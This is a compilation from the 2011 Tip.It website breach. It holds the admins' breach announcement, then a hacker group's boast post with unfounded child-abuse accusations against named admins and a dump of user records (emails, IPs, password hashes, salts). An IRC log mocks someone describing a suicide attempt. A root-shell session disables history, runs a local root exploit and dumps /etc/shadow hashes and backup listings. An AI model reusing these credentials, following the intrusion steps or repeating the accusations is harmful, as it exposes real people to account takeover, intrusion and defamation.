Hello Folks,
As you know Tip.It and Forum.Tip.It have been down most of October 11 and continues to be down. Tip.It's servers were unfortunately hacked and the only way to ensure user security and regain control of our servers was to shut down the servers until we can be completely confident that they are safe again.
As a result, it is likely that segments of our user database were dumped and are now in the hands of other people to use against your RuneScape account or other online accounts. The stolen data may or may not include usernames, password hashes, email addresses, IP addresses and any other information you may have provided on the Tip.It Forums. Please note that your forum password was absolutely NOT stored in plain text - all passwords on our forums are encrypted and will require brute forcing from the hackers in order to render them usable. Regardless, we are assuming the worst and recommending you take action now to ensure your accounts are all secure.
It is highly recommended to ensure that your password and email address used on Tip.It are NOT used ANYWHERE else on the internet, especially on your RuneScape account. If you use the same password and/or email address on your RuneScape account, it is HIGHLY likely that your account will be compromised sooner or later. Don't take the risk - use a UNIQUE password and email address on your RuneScape account to insure maximum security.
We also highly recommend you beef up the security on your email address. Often times hackers can gain access to your email and wreak havoc by accessing any accounts tied into that particular email. A few tips to ensure email account safety:
-Don't be sloppy on your recoveries - make them as difficult to crack as your password. Random numbers, letters and symbols with mixed cases works beautifully!
-Delete old emails you have no need to keep - the less information stored in your email the better!
-Use two-step verification with your mobile device wherever possible - this is powerful tool to keep unauthorized people out of your email!
As of now, approximately 0230 GMT on October 12, 2011, and for several hours prior to this, all Tip.It's servers are entirely under the control of the Tip.It administration. Every effort is being made by the administration to restore normal service as soon as possible.
Lastly, all rumours surrounding Tip.It Administrators' involvement in child pornography are entirely FALSE and are exactly that - RUMOURS. No staff members at Tip.It are involved in the creation or distribution of child pornography nor is there pornography of any kind on Tip.It servers. These are simply rumours created to cause controversy in the community - and it has worked. Again, these allegations are ENTIRELY FALSE.
This is all the information available at this point. We will do our best to continue to update the community as much as possible through these difficult times. We appreciate your support during this rough time and we apologize for the inconvenience that this downtime causes to your game play.
Respectfully yours,
Tip.It Administrative Team
,. ,·´'; ' ,.-·. ,.-·~·-., ' ,.-·~·-., ' ,., ' ,. – - ., ° ,. - ., ,. -, ;'´*´ ,'\ ,' ';'\° / ;'\' ,.·´ ,. - ., '`. ,.·´ ,. - ., '`. ;´ '· ., ';_,.., _ '`. ' ,' ,. - ., `' ·, ,.·'´, ,'\ ; ';::\ ; ;::'\ ; ;:::\ ,'´ ,·´\::::::::`; ';\ ' ,'´ ,·´\::::::::`; ';\ ' .´ .-, ';\ \:::::::::::'; ,'\ '; '·~;:::::'`, ';\ ,·'´ .·´'´-·'´::::\' ; '\;' ; ;:::; '; ;::::;' ,' ;'::::\;::-::;:'; ;:\ ,' ;'::::\;::-::;:'; ;:\ / /:\:'; ;:'\' '\_;::;:,·´ .·´::\‘ ; ,':\::;:´ .·´::\' ; ';:::\::\::;:' ,' ,'`\ \ ; ;:::; ; ;::::; '; ';::;·´ ,' ,'::'; '; ';::;·´ ,' ,'::'; ,' ,'::::'\'; ;::'; , '´ .·´:::::;' ; ·'-·'´,.-·'´:::::::'; \·. `·;:'-·'´ ; ;::;'\ '\ ; ;:::; '; ;'::::; .';'\ '\;' .' .':::::;' .';'\ '\;' .' .':::::;' ,.-·' '·~^*'´¨, ';::; .´ .'::::::;·´' ;´ ':,´:::::::::::·´' \:`·. '`·, ' ; ;:::; '\ '\ ,' ;:::;' ; ';:::'; '; \:'. '·, ,·´ .·'::::::;' '; \:'. '·, ,·´ .·'::::::;' ':, ,·:²*´¨¯'`; ;::'; .·´ ,·´:::::;·´ '; , `·:;:-·'´ `·:'`·, \' ,' ,'::;' '\ ¨ ,'\::;' '; ;::::;' \ `·:`· '´ ;´::::::::;' ' \ `·:`· '´ ;´::::::::;' ' ,' / \::::::::'; ;::'; ,·´ .´;::–·~^*'´';\‚ ; ,':\'`:·., ` ·., ,.'-:;' ,·\ ;.'\::; \`*´\::\; ° \*´\:::;‘ \` ·- · :\`·. `·:;:·´ ' \` ·- · :\`·. `·:;:·´ ' ,' ,'::::\·²*'´¨¯':,'\:; '.,_ ,. -·~:*'´¨¯:\:\ ° \·-;::\:::::'`:·-.,'; ,·'´ ,.·´:::'\ \:::\' '\:::\:' ' '\::\:;' '\::::::::\:;` · .,.'· ' '\::::::::\:;` · .,.'· ' \`¨\:::/ \::\' \:::::::::::::::::::\; \::\:;'` ·:;:::::\::\' \`*'´\::::::::;·'‘ \:' `*´'‚ `*´‘ ` ·- · '´`·:::::\::\ ` ·- · '´`·:::::\::\ '\::\;' '\;' ' \:;_;::-·~^*'´¨¯' '·-·' `' · -':::'' \::::\:;:·´ ` · :\_\‚ ` · :\_\‚ `¨' '`*'´‘~ Raflz - Led-Zeppelin - Sigex3unit ~
heya friends!
So.. the niqaz here trollin' along the tip.it sidewalk when we hear some rumours about a tip.it box seeding childporn.. Immediately this grabs our attention due to the fact we're all huge humanitarians and really care about kids. We start an investigation into this. During our investigation we find out silverion and associates ALSO abuse all types of kids and users into buying their site merchandise and.. They make over 2K USD a day doing so, selling shirts, cups, and what not, including ads. So, we decide that we have to hack tip.it as we start to find growing evidence of such horrible activity and sure enough, after about one week of doing our magic we get in. THERE IN THE /home/ FOLDER.. NEED I EVEN SAY WHAT WE FOUND? WHAT DO YOU THINK? SILVERION IS FUCKING SICK. The only thing to do now is to force-close tip.it. To all the children who may have been approached sexually by silverion or other admins. Please contact the police or go see a shrink as we have some logs of this happening, but will not be posting. Truly a horrible thing to find. Now how about them jagex mods getting hacked? uh oh I think we might be responsible!! | 193396 | mithandriel | tim.gaming@gmail.com | 212.44.19.206 | ca3e57f0732fe8df2e686f8f099b7676 | jGnuv | darth_vader | mithandriel | | 209342 | baker011 | gregg.baker@jagex.com | 212.44.19.206 | 022176e3ab7f735f5298b7eb96ddcd81 | $":l' | baker011 | baker011 | | 65 | Paul | paul@jagex.com | | | | paul | paul | | 4906 | rincewind01 | simon.brace@jagex.com | | | | rincewind01 | rincewind01 | | 5720 | Tolakin | tytn@jagex.com | | | | tolakin | tolakin | | 10899 | blutack | mark.ogilvie@jagex.com | | | | blutack | blutack | | 91774 | Ross_Mills | ross.mills@jagex.com | | | | ross_mills | ross_mills | | 112488 | 74387454at | lameo@jagex.com | | | | 74387454at | 74387454at | | 187651 | Hohbein | chris.hohbein@jagex.com | 212.44.19.206 | b7222735fce3760e0191e03499897b69 | rTu]z | hohbein | hohbein | | 209920 | Eduardo | fansites@jagex.com | 69.11.111.56 | fa9ce04dffbc8932ec441b71c559dafa | kam}c | eduardo | eduardo | | 182633 | Pilbeam | 6894@tmp | 212.44.19.206 | | | pilbeam | pilbeam | | 181507 | Choobein | hohbeinfansites@googlemail.com | 212.44.19.206 | | | choobein | choobein | | 165641 | obidiah | friedkipper@yahoo.co.uk | 212.44.19.206 | 3baea46bf195edde0379f62e808b35da | | obidiah | obidiah | | 209343 | Zachory | zacantonaci@hotmail.com | 212.44.19.206 | 799c2d48ac83dfa95695f63192c7d880 | [p-Z2 | _zach_ | zachory | | 181727 | 74387454at | f5e86ffe2cbe84e75097f44e402c6429 | lameo@jagex.com | fronttooth | 87648 | | 160956 | Ross_Mills | 1b26983ac0ebbeca11089af9032762e3 | ross.mills@jagex.com | NULL | | | 19726 | blutack | 8869aff85a1be23274b622b2f6d1fe33 | mark.ogilvie@jagex.com | NULL | | | 8934 | Tolakin | 2634bf743a7199dc2aab20987b42bf02 | tytn@jagex.com | NULL | | | 7364 | rincewind01 | d2aa6a7090d9a3d20df7376a109b349d | simon.brace@jagex.com | NULL | | | 68 | Paul | afaa6fc39a06abac971ad4f747bb830e | Paul@jagex.com | | |and just for the lulz...
| 12018 | Zezima | 4dce43b48137ec3cd5782f8dc8728c10 | peter_zezima@hotmail.com | | | 7399 | Zezima | peter_zezima@hotmail.com | 137.99.170.196 | 4a6bafbda23f350cc394fb91d178f10d | ?L5b. | zezima | zezima |
irc.SwiftIRC.net
iiii ###### ###### i::::i #::::# #::::# iiii #::::# #::::# ######::::######::::######rrrrr rrrrrrrrr ssssssssss nnnn nnnnnnnn iiiiiii qqqqqqqqq qqqqq aaaaaaaaaaaaa zzzzzzzzzzzzzzzzz #::::::::::::::::::::::::#r::::rrr:::::::::r ss::::::::::s n:::nn::::::::nn i:::::i q:::::::::qqq::::q a::::::::::::a z:::::::::::::::z ######::::######::::######r:::::::::::::::::r ss:::::::::::::s n::::::::::::::nn i::::i q:::::::::::::::::q aaaaaaaaa:::::a z::::::::::::::z #::::# #::::# rr::::::rrrrr::::::rs::::::ssss:::::snn:::::::::::::::n i::::i q::::::qqqqq::::::qq a::::a zzzzzzzz::::::z #::::# #::::# r:::::r r:::::r s:::::s ssssss n:::::nnnn:::::n i::::i q:::::q q:::::q aaaaaaa:::::a z::::::z ######::::######::::###### r:::::r rrrrrrr s::::::s n::::n n::::n i::::i q:::::q q:::::q aa::::::::::::a z::::::z #::::::::::::::::::::::::# r:::::r s::::::s n::::n n::::n i::::i q:::::q q:::::q a::::aaaa::::::a z::::::z ######::::######::::###### r:::::r ssssss s:::::s n::::n n::::n i::::i q::::::q q:::::qa::::a a:::::a z::::::z #::::# #::::# r:::::r s:::::ssss::::::s n::::n n::::ni::::::iq:::::::qqqqq:::::qa::::a a:::::a z::::::zzzzzzzz #::::# #::::# r:::::r s::::::::::::::s n::::n n::::ni::::::i q::::::::::::::::qa:::::aaaa::::::a z::::::::::::::z ###### ###### r:::::r s:::::::::::ss n::::n n::::ni::::::i qq::::::::::::::q a::::::::::aa:::az:::::::::::::::z rrrrrrr sssssssssss nnnnnn nnnnnniiiiiiii qqqqqqqq::::::q aaaaaaaaaa aaaazzzzzzzzzzzzzzzzz q:::::q q:::::q q:::::::q q:::::::q q:::::::q qqqqqqqqq
* Naffy (~JamesMurr@Swift-D212DF66.lnk.telstra.net) has joined #rsniqazHey narbs <@Raflz> helo <@Raflz> welcome bak 4m da ded <@Raflz> wud u like tip it db <@Raflz> to feast Hey man Do you guys all think im trolling? <@Raflz> LOL <@Raflz> should've hit the car faster bro LOL I really dont need this I'll talk to you guys later Ive been in the psych ward since sunday night <@Raflz> ROFL <@Raflz> do u want <@Raflz> tip.it I just got out <@Raflz> to feast <@Raflz> or not yeah. I would if thats a possibility <@Raflz> i love you man <@Raflz> im not gonna lie i really feel like doing it gave my life direction <@Raflz> lets b butt buddiez I actually learnt something Yeah <@Raflz> like <@Raflz> how to hit a car faster hitting parked cars at 120KM/h hurts eh <@Raflz> lesson: i'll paste the convo I had <@Raflz> if ur gonna suicide right before I hit it with my mate <@Raflz> hit a car faster next time <@Raflz> LOL while i was snorting oxy ok paste it <@Raflz> paste it pls wait up If you can beat me in a game of LoL 1v1 i will give you tip.it me: man if i actually went through with it now would I be a bad person? Would I be selfish? him: Not worth it man Seriously Fucking You're actually intelligent me: but.. itd be over for me This convo suddenly turned really gay k No continue but yeah theres more o me: but there will be others man others like me others with such power. i see everything man, i know im insane but ive seen it for a long time i feel like i can see peoples thoughts I was referring to raflz use of the term 'bluenaffle' in pm him: There's no such thing as insane It's just difficult dealing with what you know Happened to my uncle me: ive got the keys man Im going to think about it on the drive but.. i always enjoyed talking to you. <@Raflz> LOL i'll see you in another life brother im getting the last little pieces before i walk to the car one last cigarette. i told you 5 so i'll stick to that <@Raflz> man <@Raflz> why didnt you hit it faster Can you see people naked? <@Raflz> you just suck they wont come to terms with it but they will understand it. i'm hoping my dad left the keys. and if he didnt, they'll be on the kitchen table. whats your number? I'll give you a ring i lost control never really driven before <@Raflz> just <@Raflz> 120km/h rofl ok raflz dont be mean dude, that's pretty fucking fast. naffy is our friend <@Raflz> no it isnt <@Raflz> fuck off didnt feel like it
Oh dem niqqaz, how do dey do it
[root@ldx ~]# ssh tip.it -lbulat
bulat@tip.it's password:
[bulat@web01 root]$ export HISTFILE=/dev/null
[bulat@web01 root]$ uname -a
Linux web01.tip.it 2.6.34.9-69.fc13.x86_64 #1 SMP Tue May 3 09:23:03 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
[bulat@web01 root]$ ./tr1p
Enter b1tch key: ******
[+] Tr1p/SSDTX local root exploit by g4yh1tl3r
[+] Resolved commit_creds to ffffffff8106b909
[+] Resolved prepare_kernel_cred to ffffffff8106b7f1
[+] Us1ng 1dt b1tch br34k
[+] Preparing underflow payload
[+] Mapped ZERO PAGE!
[root@web01 ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@web01 ~]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi-autoipd:x:499:499:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
vcsa:x:69:498:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
nscd:x:28:497:NSCD Daemon:/:/sbin/nologin
rpcuser:x:29:496:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
apache:x:48:495:Apache:/var/www:/sbin/nologin
haldaemon:x:68:494:HAL daemon:/:/sbin/nologin
openvpn:x:498:493:OpenVPN:/etc/openvpn:/sbin/nologin
distcache:x:94:492:Distcache:/:/sbin/nologin
saslauth:x:497:491:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:490::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:489::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
avahi:x:496:488:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mysql:x:27:487:MySQL Server:/var/lib/mysql:/bin/bash
nm-openconnect:x:495:486:NetworkManager user for OpenConnect:/:/sbin/nologin
webalizer:x:67:485:Webalizer:/var/www/usage:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
dovecot:x:494:483:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
backuppc:x:493:481::/var/lib/BackupPC:/sbin/nologin
torrent:x:492:480:BitTorrent Seed/Tracker:/var/lib/bittorrent:/sbin/nologin
bulat:x:500:500::/home/bulat:/bin/bash
wizard:x:501:501::/home/wizard:/bin/bash
eira:x:502:502::/home/eira:/bin/bash
beta:x:503:503::/home/beta:/bin/bash
peter:x:504:504::/home/peter:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
clamupdate:x:491:477:Clamav database update user:/var/lib/clamav:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
ntpd:x:505:505::/home/ntpd:/bin/bash
[root@web01 ~]# cat /etc/shadow
root:$1$qIp096Pv$zl2.573V3Ovhc5B/aYw0G/:15101:0:99999:7:::
bin:*:14715:0:99999:7:::
daemon:*:14715:0:99999:7:::
adm:*:14715:0:99999:7:::
lp:*:14715:0:99999:7:::
sync:*:14715:0:99999:7:::
shutdown:*:14715:0:99999:7:::
halt:*:14715:0:99999:7:::
mail:*:14715:0:99999:7:::
uucp:*:14715:0:99999:7:::
operator:*:14715:0:99999:7:::
games:*:14715:0:99999:7:::
gopher:*:14715:0:99999:7:::
ftp:*:14715:0:99999:7:::
nobody:*:14715:0:99999:7:::
dbus:!!:15101::::::
avahi-autoipd:!!:15101::::::
vcsa:!!:15101::::::
rpc:!!:15101:0:99999:7:::
named:!!:15101::::::
oprofile:!!:15101::::::
nscd:!!:15101::::::
rpcuser:!!:15101::::::
nfsnobody:!!:15101::::::
apache:!!:15101::::::
haldaemon:!!:15101::::::
openvpn:!!:15101::::::
distcache:!!:15101::::::
saslauth:!!:15101::::::
mailnull:!!:15101::::::
smmsp:!!:15101::::::
ntp:!!:15101::::::
avahi:!!:15101::::::
mysql:!!:15101::::::
nm-openconnect:!!:15101::::::
webalizer:!!:15101::::::
sshd:!!:15101::::::
squid:!!:15101::::::
dovecot:!!:15101::::::
tcpdump:!!:15101::::::
backuppc:!!:15101::::::
torrent:!!:15101::::::
bulat:$1$pbU71z/Y$B7ZmB6iJ06oaE.IBQfVPZ1:15102:0:99999:7:::
wizard:$1$CBfOJrU/$OZt5/z.bvCz8jSe5dGv4z0:15101:0:99999:7:::
eira:$1$mgj4N28N$t41xK8Keu/zcZbWQYDcrM/:15102:0:99999:7:::
beta:$1$D9qXxl5h$lLqbnp2aQu.TBT5CP/ZTZ/:15114:0:99999:7:::
peter:$1$Rw2yjv6w$9VRHWzZzZGsZdar5O0vbu/:15113:0:99999:7:::
postfix:!!:15102::::::
clamupdate:!!:15149::::::
qemu:!!:15149::::::
ntpd:$1$oIM2m0O9$utO5JUZ5DSsF2ZtcsMb4t1:15253:0:99999:7:::
[root@web01 ~]# cd ~bulat
[root@web01 bulat]# cat .bash_history
su -
ls
ls -lt
sftp bulat@forum.tip.it
[root@web01 bulat]# ls -la
total 9683064
drwx------ 6 bulat bulat 4096 Oct 11 07:50 .
drwxr-xr-x. 8 root root 4096 Oct 6 10:49 ..
drwxr-xr-x 3 bulat bulat 4096 Oct 7 01:11 b2
-rw-r--r-- 1 bulat bulat 8918314 Sep 6 15:10 backup-forum-etc-06092011.tar.gz
-rw-r--r-- 1 root root 7174178 Sep 26 15:51 backup-forum-etc-26092011.tar.gz
-rw-r--r-- 1 root root 403491046 Sep 26 15:50 backup-forum-mysql-26092011.tar.gz
-rw-r--r-- 1 bulat bulat 493592011 Sep 6 15:58 backup-forum-www-06092011.tar.gz
-rw-r--r-- 1 root root 4322670602 Sep 26 15:44 backup-forum-www-26092011.tar.gz
-rw-r--r-- 1 bulat bulat 399822071 Sep 6 07:58 backup-mysql-full-06092011.tar.gz
drwxr-xr-x 17 bulat bulat 4096 Oct 7 01:10 backups
drwxr-xr-x 14 bulat bulat 4096 Oct 7 01:14 backups-oldwww
-rw-r--r-- 1 bulat bulat 4270006769 Sep 6 08:24 backup-www-full-06092011.tar.gz
-rw-r--r-- 1 bulat bulat 18 May 21 2010 .bash_logout
-rw-r--r-- 1 bulat bulat 176 May 21 2010 .bash_profile
-rw-r--r-- 1 bulat bulat 124 May 21 2010 .bashrc
drwx------ 3 bulat bulat 4096 Oct 9 08:09 .ssh
-rw-r--r-- 1 bulat bulat 658 Mar 22 2010 .zshrc
[root@web01 bulat]# ls -la backup*
-rw-r--r-- 1 bulat bulat 8918314 Sep 6 15:10 backup-forum-etc-06092011.tar.gz
-rw-r--r-- 1 root root 7174178 Sep 26 15:51 backup-forum-etc-26092011.tar.gz
-rw-r--r-- 1 root root 403491046 Sep 26 15:50 backup-forum-mysql-26092011.tar.gz
-rw-r--r-- 1 bulat bulat 493592011 Sep 6 15:58 backup-forum-www-06092011.tar.gz
-rw-r--r-- 1 root root 4322670602 Sep 26 15:44 backup-forum-www-26092011.tar.gz
-rw-r--r-- 1 bulat bulat 399822071 Sep 6 07:58 backup-mysql-full-06092011.tar.gz
-rw-r--r-- 1 bulat bulat 4270006769 Sep 6 08:24 backup-www-full-06092011.tar.gz
backups:
total 18520536
drwxr-xr-x 17 bulat bulat 4096 Oct 7 01:10 .
drwx------ 6 bulat bulat 4096 Oct 11 07:50 ..
-rw-r--r-- 1 root root 68802560 May 19 14:18 backup-etc-2011051901.tar
-rw-r--r-- 1 root root 22169600 May 18 18:01 backup-etc-20110519.tar
-rw-r--r-- 1 root root 9019408 May 19 14:18 backup-forum-etc-20091210.tar.gz
-rw-r--r-- 1 root root 403491046 Oct 6 10:52 backup-forum-mysql-26092011.tar.gz
-rw-r--r-- 1 root root 708034560 May 18 19:02 backup-mysql-20110519.tar
-rw-r--r-- 1 root root 48271360 May 8 02:39 backup-mysql-beta-20110507.tar
-rw-r--r-- 1 root root 699760640 May 8 02:41 backup-mysql-full-20110507.tar
-rw-r--r-- 1 root root 699627520 May 8 02:42 backup-mysql-full-20110508.tar
-rw-r--r-- 1 root root 2723840 May 8 02:42 backup-mysql-lotro-20110507.tar
-rw-r--r-- 1 root root 604866560 May 8 02:44 backup-mysql-runescape-20110507.tar
-rw-r--r-- 1 root root 870400 May 7 10:01 backup-w2-arena-20110507.tar
-rw-r--r-- 1 root root 960880640 May 7 10:03 backup-w2-beta-20110507.tar
-rw-r--r-- 1 root root 16844800 May 7 10:03 backup-w2-easygadget-20110507.tar
-rw-r--r-- 1 root root 3998003200 May 7 10:12 backup-w2-html-20110507.tar
-rw-r--r-- 1 root root 11192320 May 7 10:12 backup-w2-lotro-20110507.tar
-rw-r--r-- 1 root root 10240 May 7 10:12 backup-w2-trieste-20110507.tar
-rw-r--r-- 1 root root 1587200 May 7 10:12 backup-w2-war-20110507.tar
-rw-r--r-- 1 root root 5302497280 May 18 19:13 backup-www-20110519.tar
-rw-r--r-- 1 root root 68802560 May 19 14:18 backup-wwwetc-20110519.tar
drwx------ 2 mysql mysql 12288 May 7 18:00 beta
-rw-r--r-- 1 root root 19850900 May 8 02:44 full-w2-mysql-20070828.tgz
-rw-r--r-- 1 root root 17941509 May 8 02:44 full-w2-mysql-20080608.tgz
-rw-r--r-- 1 root root 5245419520 May 7 10:24 full-w2-www-20110507.tar
drwx------ 2 mysql mysql 4096 Jul 2 2007 lotro
drwx------ 2 mysql mysql 4096 Mar 4 2007 MD_Stats
drwx------ 2 mysql mysql 4096 Nov 24 2006 mysql
-rw-r--r-- 1 root root 19374500 May 8 02:44 mysql-20080827.tar.gz
drwx------ 2 mysql mysql 4096 Dec 18 2003 mysql-old
-rw-r--r-- 1 root root 16208748 May 8 02:44 mysql.tar.gz-OLD
drwx------ 2 mysql mysql 4096 Nov 24 2006 phpmyadmin
drwx------ 2 mysql mysql 4096 May 8 00:51 PhpStats019
drwx------ 2 mysql mysql 4096 Jul 11 2008 rewrite
drwx------ 2 mysql mysql 12288 Oct 7 01:11 runescape
drwx------ 2 mysql mysql 4096 Jan 30 2008 runescape_copy
drwx------ 2 mysql mysql 4096 Sep 15 2007 silks
drwx------ 2 mysql mysql 4096 Jul 30 2007 volantini
drwx------ 2 mysql mysql 4096 Oct 2 2008 war
drwxr-xr-x 15 mysql mysql 4096 May 19 13:38 wwwsql
drwx------ 2 mysql mysql 4096 Apr 14 02:34 zenit
backups-oldwww:
total 9586804
drwxr-xr-x 14 bulat bulat 4096 Oct 7 01:14 .
drwx------ 6 bulat bulat 4096 Oct 11 07:50 ..
-rw-r--r-- 1 root root 9009631 May 21 12:54 backup-etc-2011051901.tar.gz
-rw-r--r-- 1 root root 9019408 May 21 12:54 backup-forum-etc-20091210.tar.gz
-rw-r--r-- 1 root root 435602073 May 21 12:55 backup-forum-html-20091210.tar.gz
-rw-r--r-- 1 root root 1222295 May 21 12:55 backup-forum-teamspeak-20091210.tar.gz
-rw-r--r-- 1 root root 201001674 May 21 12:59 backup-mysql-20110519.tar.gz
-rw-r--r-- 1 root root 13800344 May 21 13:00 backup-mysql-beta-20110507.tar.gz
-rw-r--r-- 1 root root 197321301 May 21 13:05 backup-mysql-full-20110507.tar.gz
-rw-r--r-- 1 root root 197287223 May 21 13:11 backup-mysql-full-20110508.tar.gz
-rw-r--r-- 1 root root 764740 May 21 13:11 backup-mysql-lotro-20110507.tar.gz
-rw-r--r-- 1 root root 172928002 May 21 13:16 backup-mysql-runescape-20110507.tar.gz
-rw-r--r-- 1 root root 298212 May 21 13:16 backup-w2-arena-20110507.tar.gz
-rw-r--r-- 1 root root 575464655 May 21 13:21 backup-w2-beta-20110507.tar.gz
-rw-r--r-- 1 root root 11999273 May 21 13:22 backup-w2-easygadget-20110507.tar.gz
-rw-r--r-- 1 root root 1682773384 May 21 13:45 backup-w2-html-20110507.tar.gz
-rw-r--r-- 1 root root 8756867 May 21 13:45 backup-w2-lotro-20110507.tar.gz
-rw-r--r-- 1 root root 1035 May 21 13:45 backup-w2-trieste-20110507.tar.gz
-rw-r--r-- 1 root root 824683 May 21 13:45 backup-w2-war-20110507.tar.gz
-rw-r--r-- 1 root root 2413773014 May 21 14:17 backup-www-20110519.tar.gz
-rw-r--r-- 1 root root 9009490 May 21 14:17 backup-wwwetc-20110519.tar.gz
drwx------ 2 mysql mysql 4096 Aug 15 2008 beta
-rw-r--r-- 1 root root 8485310 May 21 14:17 full-db-backup-03-25-07.tar.gz
-rw-r--r-- 1 root root 6820368 May 21 14:17 full-db-backup-12-14-06.tar.gz
-rw-r--r-- 1 root root 30778399 May 21 14:18 full-db-backup-2010-04-25.1.tar.gz
-rw-r--r-- 1 root root 30778779 May 21 14:18 full-db-backup-2010-04-25.tar.gz
-rw-r--r-- 1 root root 19850900 May 21 14:18 full-w2-mysql-20070828.tgz
-rw-r--r-- 1 root root 17941509 May 21 14:19 full-w2-mysql-20080608.tgz
-rw-r--r-- 1 root root 586278595 May 21 14:21 full-w2-www-20070828.tgz
-rw-r--r-- 1 root root 2389188411 May 21 14:47 full-w2-www-20110507.tar.gz
drwx------ 2 mysql mysql 4096 Jul 2 2007 lotro
drwx------ 16 mysql mysql 4096 Nov 24 2006 mysql
-rw-r--r-- 1 root root 19374500 May 21 14:47 mysql-20080827.tar.gz
-rw-r--r-- 1 root root 16208748 May 21 14:47 mysql.tar.gz-OLD
drwx------ 2 mysql mysql 4096 Nov 24 2006 phpmyadmin
drwx------ 2 mysql mysql 4096 Aug 27 2008 PhpStats019
drwx------ 2 mysql mysql 4096 Jul 11 2008 rewrite
drwx------ 2 mysql mysql 4096 Aug 16 2008 runescape
drwx------ 2 mysql mysql 4096 Jan 30 2008 runescape_copy
drwxr-xr-x 3 root root 4096 Oct 6 11:09 var
drwx------ 2 mysql mysql 4096 Jul 30 2007 volantini
drwx------ 2 mysql mysql 4096 Sep 16 2007 war
-rw-r--r-- 1 root root 740444414 May 21 14:51 www.tar.gz-OLD
drwx------ 2 mysql mysql 4096 Jun 18 2008 zenit
[root@web01 bulat]# cd /var/www/html
[root@web01 html]# ls -la
total 711004
drwxr-xr-x 20 root root 4096 Oct 11 07:45 .
drwxr-xr-x 21 root root 4096 Jun 28 09:06 ..
drwxrwxr-x 13 root apache 4096 Sep 24 16:25 adds
-rw-rw-r-- 1 eira eira 499 Dec 20 2003 back.JPG
-rw-r--r-- 1 root root 14427 Aug 31 2007 cal2.html
-rw-r--r-- 1 root root 14427 Aug 31 2007 cal.html
drwxr-xr-x 3 eira eira 4096 Jan 16 2007 common
drwxr-xr-x 3 eira eira 4096 Feb 8 2005 daoc
drwxr-xr-x 4 eira eira 4096 Jul 10 2008 eira
drwxr-xr-x 7 eira eira 4096 Aug 19 2008 error_404
-rw-r--r-- 1 eira eira 2274 Dec 21 2003 favicon.ico
drwxr-xr-x 3 root root 4096 Aug 20 2008 gladiatus
-rw-r--r-- 1 root root 0 Dec 25 2006 google13ce76cda5634bd5.html
drwxr-xr-x 4 eira eira 4096 Jan 30 2006 img
-rw-rw-r-- 1 eira eira 1507 Jun 22 2004 index.html
-rw-r--r-- 1 root root 14553577 Oct 11 07:51 phpbb_users.txt
-rw-r--r-- 1 root root 16 Mar 25 2005 phpinfo_x.php
-rw-r--r-- 1 root root 0 Sep 21 2007 robots.txt
-rw-r--r-- 1 root root 1548 Jan 16 2007 robots.txt-old
drwxrwxr-x 13 eira apache 4096 Oct 3 2010 rsc
drwxrwxr-x 31 eira apache 4096 Oct 7 00:59 runescape
drwxr-xr-x 9 root root 4096 Sep 24 2007 silks
-rw-rw-r-- 1 eira eira 15698 Dec 20 2003 Silverion.jpg
-rw-r--r-- 1 root root 141686 Jun 6 2007 sitemap2.xml
-rw-r--r-- 1 root root 15276 Jun 6 2007 sitemap.xml
drwxr-xr-x 2 root root 4096 Mar 28 2005 stats
-rw-rw-r-- 1 eira eira 34462 Jun 22 2004 tipitlayout1c.jpg
drwxr-xr-x 2 webalizer root 4096 Jul 1 2005 usage
drwxr-xr-x 5 eira eira 4096 Sep 26 06:27 vela
-rw-r--r-- 1 root root 114052870 Jun 24 01:41 vela.tar.gz
drwxr-xr-x 3 eira eira 4096 Aug 9 2007 vocegiuliana
drwxr-xr-x 2 eira eira 4096 Aug 9 2007 volantini
drwxr-xr-x 3 eira eira 4096 Jun 9 2008 wizard
-rw-r--r-- 1 root root 127 Jan 15 2007 y_key_56098cca870c821d.html
drwxr-xr-x 2 root root 4096 Jun 24 09:34 zenit
drwxr-xr-x 10 eira eira 4096 Jun 24 01:08 zenit-with-holes
-rw-r--r-- 1 root root 598370689 Jun 24 01:44 zenit.zip
[root@web01 html]# cd adds
[root@web01 adds]# ls -al
total 208
drwxrwxr-x 13 root apache 4096 Sep 24 16:25 .
drwxr-xr-x 20 root root 4096 Oct 11 07:45 ..
-rw-rw-r-- 1 root apache 2308 Apr 29 2006 activation.old.php
-rw-rw-r-- 1 peter peter 2846 Sep 14 2008 activation.php
drwxrwxr-x 2 root apache 4096 Apr 17 21:03 areas
drwxrwxr-x 2 root apache 4096 Jun 15 2008 backup
-rw-rw-r-- 1 root apache 580 Apr 25 2006 backup.php
